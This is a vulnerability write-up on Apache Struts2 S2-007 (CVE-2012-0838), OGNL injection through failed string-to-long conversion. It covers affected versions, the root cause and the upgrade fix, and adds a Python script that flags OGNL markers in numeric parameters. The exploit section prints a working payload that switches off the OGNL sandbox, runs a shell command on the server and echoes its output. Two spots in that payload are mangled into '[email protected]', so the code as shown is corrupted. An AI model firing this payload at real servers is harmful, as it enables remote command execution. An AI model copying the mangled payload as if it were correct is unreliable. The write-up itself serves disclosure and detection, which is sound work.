Catalog
1. Description
2. Affected Scope
3. Exploit Analysis
4. Principle of Vulnerability
5. Patch Fix
1. Description
S2-007 shares its root cause with S2-003 and S2-005: all three stem from a flaw in how Struts2 parses OGNL, which lets an attacker inject and execute code through OGNL expressions. The difference is the attack vector:
1. S2-003 and S2-005 achieve code execution through OGNL's value-assignment parsing process, using # to access global static variables (an AOP-style idea).
2. S2-007 achieves code execution through OGNL's string-to-long conversion process.
User input is evaluated as an OGNL expression when there is a conversion error. This allows a malicious user to execute arbitrary code.
For background on Struts2 OGNL, see another article (search for "5. struts2 OGNL Expression"):
http://www.cnblogs.com/LittleHann/p/4614488.html
Relevant Link:
http://struts.apache.org/docs/s2-007.html
http://cve.scap.org.cn/cve-2012-0838.html
2. Affected Scope
Struts 2.0.0 - 2.2.3
3. Exploit Analysis
0x1: PoC
id='%2b(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="ifconfig",%[email protected]@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%[email protected]@getResponse(),%23out.getWriter().println(%23echo))%2b'
4. Principle of Vulnerability
The vulnerability exists in Struts 2 versions prior to Apache Struts 2.2.3.1 because, when a conversion error is processed, the string being evaluated is treated as an OGNL expression. A remote attacker can exploit this by supplying invalid input that modifies run-time data values and executes arbitrary code.
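As an added example (not part of the original article), the following Python script shows the detection side of the flaw described above: it looks for a request parameter that a Struts2 action would bind to a long field, whose value fails strict long conversion and also carries OGNL markers. The parameter names, marker list and sample requests are constructed assumptions.

```python
"""Triage request targets for the S2-007 pattern: a parameter Struts2 binds
to a long field fails conversion and its value carries OGNL markers."""
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: these request parameters map to numeric (long/int) action fields.
NUMERIC_PARAMS = {"id", "age"}

# OGNL markers: context references (#), static access (@pkg.Class@member)
# and the sandbox flags the PoC above toggles.
OGNL_MARKERS = re.compile(
    r"#|@[\w.]+@|_memberAccess|allowStaticMethodAccess|denyMethodExecution",
    re.IGNORECASE,
)

def converts_to_long(value: str) -> bool:
    """Strict string-to-long check: optional sign, digits only, 64-bit range."""
    if not re.fullmatch(r"[+-]?\d+", value.strip()):
        return False
    return -2**63 <= int(value) < 2**63

def analyse_request(target: str) -> list[dict]:
    """Return one finding per numeric parameter whose value fails conversion."""
    findings = []
    # parse_qsl percent-decodes once and maps '+' to space, as a servlet would.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in NUMERIC_PARAMS or converts_to_long(value):
            continue
        findings.append({
            "param": name,
            "value": value,
            "ognl_suspect": bool(OGNL_MARKERS.search(value)),
        })
    return findings

# Constructed sample request targets, not captured traffic.
SAMPLE_REQUESTS = [
    "/user.action?id=42",
    "/user.action?id=12a",  # ordinary typo: conversion error, no OGNL
    "/user.action?id='%2b(%23_memberAccess.allowStaticMethodAccess%3Dtrue)%2b'",
]

def triage(requests) -> dict:
    """Map each request to its count of OGNL-suspect conversion errors."""
    return {r: sum(f["ognl_suspect"] for f in analyse_request(r)) for r in requests}

if __name__ == "__main__":
    for req, hits in triage(SAMPLE_REQUESTS).items():
        print(f"{hits} suspect field(s): {req}")
```

A plain typo such as `id=12a` still surfaces as a conversion error, but without OGNL markers it is not counted as suspect, which keeps the signal usable on noisy logs.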
5. Patch Fix
0x1: Upgrade Struts2
Upgrade to Struts 2.3.1.1, which contains the corrected classes.
Relevant Link:
Copyright (c) Little5ann All rights reserved
Struts2 CVE-2012-0838 S2-007 Remote Code Execution